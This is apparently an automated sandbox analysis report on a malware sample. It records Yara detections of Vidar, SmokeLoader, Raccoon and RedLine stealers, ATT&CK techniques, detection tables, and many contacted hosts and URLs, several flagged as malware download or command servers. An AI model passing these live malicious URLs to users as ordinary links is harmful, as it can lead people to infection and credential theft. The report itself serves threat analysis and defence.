                Source: Yara match -- File source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected Vidar
                Source: Yara match -- File source: dump.pcap, type: PCAP
                Yara detected SmokeLoader
                Source: Yara match -- File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match -- File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
                Yara detected Raccoon Stealer
                Source: Yara match -- File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match -- File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\C066.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\C066.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                Remote Access Functionality:

                Yara detected RedLine Stealer
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
Yara detected Vidar
Source: Yara match, file source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Yara detected Raccoon Stealer
Source: Yara match, file source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | DLL Side-Loading 11 | DLL Side-Loading 11 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 14 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Process Injection 612 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 15 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 23 | NTDS | Security Software Discovery 431 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 5 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 116 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 11 | Cached Domain Credentials | Virtualization/Sandbox Evasion 131 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 131 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 612 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | |

                Behavior Graph

[Behavior graph image not reproduced] Behavior Graph ID: 511702, Sample: Md0q201V1D.exe, Startdate: 29/10/2021, Architecture: WINDOWS, Score: 100. Process nodes shown in the graph: Md0q201V1D.exe (starts a second Md0q201V1D.exe instance, which injects into explorer.exe), gbhudtb, bhhudtb, explorer.exe (drops C:\Users\user\AppData\Roaming\gbhudtb, C:\Users\user\AppData\Local\Temp\DF3A.exe and 18 other files, and starts CBF0.exe, 21.exe, EBBE.exe and 4 other processes), aspnet_state.exe, ServiceModelReg.exe, DF3A.exe and several chrome.exe instances. Contacted hosts shown: mas.to, github.com, 216.128.137.31, znpst.top (211.59.14.90), 194.180.174.181, 93.115.20.139, 192.168.2.3, 239.255.255.250, clients.l.google.com (142.250.203.110) and googlehosted.l.googleusercontent.com (142.250.203.97).

Screenshots

[Screenshot thumbnails not reproduced]

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

Source | Detection | Scanner | Label
Md0q201V1D.exe | 100% | Joe Sandbox ML |

                Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\1105.tmp | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\1105.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\BBE1.exe | 22% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\CAC5.exe | 55% | ReversingLabs | Win32.Trojan.Fragtor
C:\Users\user\AppData\Local\Temp\CBF0.exe | 80% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\CD17.exe | 14% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm
C:\Users\user\AppData\Local\Temp\D8D0.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Local\Temp\DF3A.exe | 43% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles

                Unpacked PE Files

Source | Detection | Scanner | Label
33.3.EBBE.exe.2d30000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.ServiceModelReg.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1141492
40.0.ServiceModelReg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141492
19.0.21.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.Md0q201V1D.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.0.gbhudtb.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.2.21.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.DF3A.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1141492
40.0.ServiceModelReg.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1141492
39.0.DF3A.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1141492
20.1.gbhudtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.0.gbhudtb.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
33.2.EBBE.exe.2d20e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
29.2.CBF0.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.1.Md0q201V1D.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.DF3A.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1141492
3.2.Md0q201V1D.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.1.bhhudtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.2.gbhudtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
29.2.CBF0.exe.3070e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.ServiceModelReg.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1141492
29.1.CBF0.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.ServiceModelReg.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1141492
3.0.Md0q201V1D.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
33.2.EBBE.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
30.2.aspnet_state.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141492
14.2.gbhudtb.2be15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.DF3A.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1141492
0.2.Md0q201V1D.exe.2d815a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.0.gbhudtb.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.21.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
29.3.CBF0.exe.3080000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
23.2.gbhudtb.2cb15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.0.gbhudtb.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.1.21.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.0.gbhudtb.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.2.gbhudtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
30.0.aspnet_state.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1141492
19.0.21.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
30.0.aspnet_state.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1141492
40.2.ServiceModelReg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141492
30.0.aspnet_state.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141492
19.0.21.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.1.gbhudtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.21.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.DF3A.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1141492
20.0.gbhudtb.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.21.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
30.0.aspnet_state.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1141492
30.0.aspnet_state.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1141492
19.0.21.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.Md0q201V1D.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.21.exe.2cc15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                Domains

                No Antivirus matches

                URLs

Source | Detection | Scanner | Label
http://tempuri.org/DetailsDataSet1.xsd | 0% | Avira URL Cloud | safe
http://sysaheu90.top/game.exe | 16% | Virustotal |
http://sysaheu90.top/game.exe | 100% | Avira URL Cloud | malware
http://65.108.80.190/936 | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://privacytoolzforyou-6000.top/downloads/toolspab2.exe | 100% | Avira URL Cloud | malware
http://65.108.80.190/mozglue.dll | 0% | URL Reputation | safe
http://65.108.80.190/freebl3.dll | 0% | URL Reputation | safe
https://mdec.nelreports.net/api/report?cat=mdocs | 0% | Avira URL Cloud | safe
http://65.108.80.190/nss3.dll | 0% | URL Reputation | safe
http://65.108.80.190/softokn3.dll | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 | 0% | Avira URL Cloud | safe
http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe | 0% | Avira URL Cloud | safe
http://toptelete.top/agrybirdsgamerept | 100% | Avira URL Cloud | malware
http://193.56.146.214/ | 0% | Avira URL Cloud | safe
http://xacokuo8.top/ | 100% | Avira URL Cloud | malware
http://hajezey1.top/ | 100% | Avira URL Cloud | malware
https://api.ip.sb/ip | 0% | URL Reputation | safe
https://dns.google | 0% | URL Reputation | safe
http://nusurtal4f.net/ | 0% | Avira URL Cloud | safe
http://znpst.top/dl/buildz.exe | 100% | Avira URL Cloud | malware
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://65.108.80.190/706 | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://194.180.174.181/ | 0% | Avira URL Cloud | safe
http://65.108.80.190/ | 0% | URL Reputation | safe
https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external | 0% | URL Reputation | safe
http://65.108.80.190/vcruntime140.dll | 0% | URL Reputation | safe
http://65.108.80.190/msvcp140.dll | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
iyc.jelikob.ru | 81.177.141.36 | true | false | | high
accounts.google.com | 172.217.168.45 | true | false | | high
avatars.githubusercontent.com | 185.199.109.133 | true | false | | high
github.com | 140.82.121.4 | true | false | | high
mas.to | 88.99.75.82 | true | false | | high
cdn.discordapp.com | 162.159.134.233 | true | false | | high
znpst.top | 211.59.14.90 | true | false | | high
nusurtal4f.net | 45.141.84.21 | true | false | | high
privacytoolzforyou-6000.top | 5.188.88.203 | true | false | | high
toptelete.top | 172.67.160.46 | true | false | | high
api.2ip.ua | 77.123.139.190 | true | false | | high
clients.l.google.com | 142.250.203.110 | true | false | | high
hajezey1.top | 5.188.88.203 | true | false | | high
sysaheu90.top | 5.188.88.203 | true | false | | high
googlehosted.l.googleusercontent.com | 142.250.203.97 | true | false | | high
js.monitor.azure.com | unknown | unknown | false | | high
xacokuo8.top | unknown | unknown | false | | high
clients2.googleusercontent.com | unknown | unknown | false | | high
telegalive.top | unknown | unknown | false | | high
clients2.google.com | unknown | unknown | false | | high

                                                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://sysaheu90.top/game.exe | true | 16%, Virustotal; Avira URL Cloud: malware | unknown
http://65.108.80.190/936 | false | Avira URL Cloud: safe | unknown
http://privacytoolzforyou-6000.top/downloads/toolspab2.exe | true | Avira URL Cloud: malware | unknown
http://65.108.80.190/mozglue.dll | false | URL Reputation: safe | unknown
http://65.108.80.190/freebl3.dll | false | URL Reputation: safe | unknown
http://65.108.80.190/nss3.dll | false | URL Reputation: safe | unknown
http://65.108.80.190/softokn3.dll | false | URL Reputation: safe | unknown
http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 | true | Avira URL Cloud: safe | unknown
http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe | true | Avira URL Cloud: safe | unknown
http://toptelete.top/agrybirdsgamerept | true | Avira URL Cloud: malware | unknown
http://193.56.146.214/ | false | Avira URL Cloud: safe | unknown
http://xacokuo8.top/ | true | Avira URL Cloud: malware | unknown
http://hajezey1.top/ | true | Avira URL Cloud: malware | unknown
http://nusurtal4f.net/ | false | Avira URL Cloud: safe | unknown
http://znpst.top/dl/buildz.exe | true | Avira URL Cloud: malware | unknown
http://65.108.80.190/706 | false | Avira URL Cloud: safe | unknown
http://194.180.174.181/ | true | Avira URL Cloud: safe | unknown
http://65.108.80.190/ | false | URL Reputation: safe | unknown
http://65.108.80.190/vcruntime140.dll | false | URL Reputation: safe | unknown
http://65.108.80.190/msvcp140.dll | false | URL Reputation: safe | unknown

                                                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://tempuri.org/DetailsDataSet1.xsd | DF3A.exe.10.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
https://duckduckgo.com/ac/?q= | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg | DEDC.exe.10.dr | false | | high
http://ocsp.sectigo.com0 | CD17.exe.10.dr | false | URL Reputation: safe | unknown
https://www.google.com/images/cleardot.gif | craw_window.js.34.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg | DEDC.exe.10.dr | false | | high
https://js.monitor.azure.com/ | Network Action Predictor.34.dr | false | | high
https://play.google.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://sandbox.google.com/payments/v4/js/integrator.js | craw_window.js.34.dr, manifest.json.34.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg | DEDC.exe.10.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg | FD36.exe.10.dr | false | | high
https://accounts.google.com/MergeSession | craw_window.js.34.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg | B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr | false | | high
https://www.google.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://mdec.nelreports.net/api/report?cat=mdocs | Reporting and NEL.36.dr | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg | DF3A.exe.10.dr | false | | high
https://accounts.google.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://sectigo.com/CPS0D | CD17.exe.10.dr | false | URL Reputation: safe | unknown
https://apis.google.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://www.google.com/accounts/OAuthLogin?issueuberauth=1 | craw_window.js.34.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg | B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr | false | | high
https://www-googleapis-staging.sandbox.google.com | craw_window.js.34.dr, craw_background.js.34.dr | false | | high
http://www.sqlite.org/copyright.html. | sqlite3.dll.35.dr | false | | high
https://clients2.google.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg | D8D0.exe.10.dr | false | | high
https://api.ip.sb/ip | B096.exe, 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, aspnet_state.exe, 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, DF3A.exe, 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, ServiceModelReg.exe, 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://dns.google | f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp.36.dr, f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | URL Reputation: safe | unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p | craw_window.js.34.dr, craw_background.js.34.dr | false | | high
https://www.google.com/intl/en-US/chrome/blank.html | craw_background.js.34.dr | false | | high
https://ogs.google.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
https://cdn.discordapp.com/attachments/8 | B096.exe | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg | BBE1.exe, 0000001B.00000000.422812164.0000000000792000.00000002.00020000.sdmp, BBE1.exe.10.dr | false | | high
https://payments.google.com/payments/v4/js/integrator.js | craw_window.js.34.dr, manifest.json.34.dr | false | | high
http://fontello.com | B096.exe, B096.exe.10.dr | false | | high
https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg | DF3A.exe.10.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
https://cdn.discordapp.com | B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp | false | | high
https://www.google.com/images/x2.gif | craw_window.js.34.dr | false | | high
https://ac.ecosia.org/autocomplete?q= | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | CD17.exe.10.dr | false | URL Reputation: safe | unknown
https://www.google.com/images/dot2.gif | craw_window.js.34.dr | false | | high
